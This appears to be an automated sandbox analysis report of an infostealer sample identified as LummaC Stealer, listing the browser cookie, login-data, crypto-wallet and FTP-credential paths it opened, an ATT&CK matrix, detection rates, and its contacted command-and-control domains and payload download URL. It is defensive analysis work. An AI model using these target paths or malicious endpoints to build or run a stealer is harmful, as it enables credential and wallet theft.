Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior

Source: Yara match	File source: 00000003.00000003.1591156418.000000000083D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1590829218.000000000083D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1792386987.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1592449873.000000000083D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1590345520.000000000083D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1589222433.000000000083D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1589995362.000000000083D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1589045882.000000000083D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1592346396.000000000083D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1591915371.000000000083D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1589570443.000000000083D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1588592421.000000000083C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1792386987.000000000083D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2889.tmp.exe PID: 7940, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: 2889.tmp.exe PID: 7940, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_004218BC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_004218BC
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_00420BE6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_00420BE6
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_02111B23 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_02111B23
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_02110E4D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_02110E4D

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	Boot or Logon Initialization Scripts	11 Process Injection	3 Obfuscated Files or Information	LSASS Memory	12 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	22 Software Packing	Security Account Manager	44 System Information Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	131 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Process Injection	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
b0cQukXPAl.exe	40%	Virustotal		Browse
b0cQukXPAl.exe	83%	ReversingLabs	Win32.Trojan.CrypterX
b0cQukXPAl.exe	100%	Avira	HEUR/AGEN.1306964
b0cQukXPAl.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\ScreenUpdateSync[1].exe	100%	Avira	HEUR/AGEN.1306978
C:\Users\user\AppData\Local\Temp\2889.tmp.exe	100%	Avira	HEUR/AGEN.1306978
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\ScreenUpdateSync[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\2889.tmp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\ScreenUpdateSync[1].exe	66%	ReversingLabs	Win32.Trojan.CrypterX
C:\Users\user\AppData\Local\Temp\2889.tmp.exe	66%	ReversingLabs	Win32.Trojan.CrypterX

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://.u	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE	0%	Avira URL Cloud	safe
https://soundtappysk.shop/api	100%	Avira URL Cloud	malware
https://store.steamp	0%	Avira URL Cloud	safe
https://post-to-me.com/	100%	Avira URL Cloud	malware
https://soundtappysk.shop/p	100%	Avira URL Cloud	malware
https://post-to-me.com/track_prt.php?sub=	100%	Avira URL Cloud	malware
https://soundtappysk.shop/x	100%	Avira URL Cloud	malware
https://s.yru	0%	Avira URL Cloud	safe
https://soundtappysk.shop/	100%	Avira URL Cloud	malware
https://post-to-me.com/track_prt.php?sub=0&cc=DE	100%	Avira URL Cloud	malware
https://sputnik-1985.com:443/api	100%	Avira URL Cloud	malware
https://sputnik-1985.com/tps:fu	100%	Avira URL Cloud	malware
https://help.steampowered.coNu5	0%	Avira URL Cloud	safe
https://soundtappysk.shop:443/api	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
post-to-me.com	104.21.56.70	true	false	high
steamcommunity.com	104.102.49.254	true	false	high
sputnik-1985.com	104.21.96.1	true	false	high
robinsharez.shop	unknown	unknown	false	high
versersleep.shop	unknown	unknown	false	high
chipdonkeruz.shop	unknown	unknown	false	high
femalsabler.shop	unknown	unknown	false	high
soundtappysk.shop	unknown	unknown	false	high
crowdwarek.shop	unknown	unknown	false	high
skidjazzyric.click	unknown	unknown	false	high
apporholis.shop	unknown	unknown	false	high
handscreamny.shop	unknown	unknown	false	high
171.39.242.20.in-addr.arpa	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
robinsharez.shop	false		high
crowdwarek.shop	false		high
skidjazzyric.click	false		high
https://sputnik-1985.com/api	false		high
femalsabler.shop	false		high
https://steamcommunity.com/profiles/76561199724331900	false		high
soundtappysk.shop	false		high
apporholis.shop	false		high
chipdonkeruz.shop	false		high
versersleep.shop	false		high
https://post-to-me.com/track_prt.php?sub=0&cc=DE	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	2889.tmp.exe, 00000003.00000003.1401432420.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1401607020.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1402733891.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://player.vimeo.com	2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.0000000000803000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	2889.tmp.exe, 00000003.00000003.1401432420.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1401607020.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1402733891.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://.u	2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.0000000000803000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/?subsection=broadcasts	2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	false		high
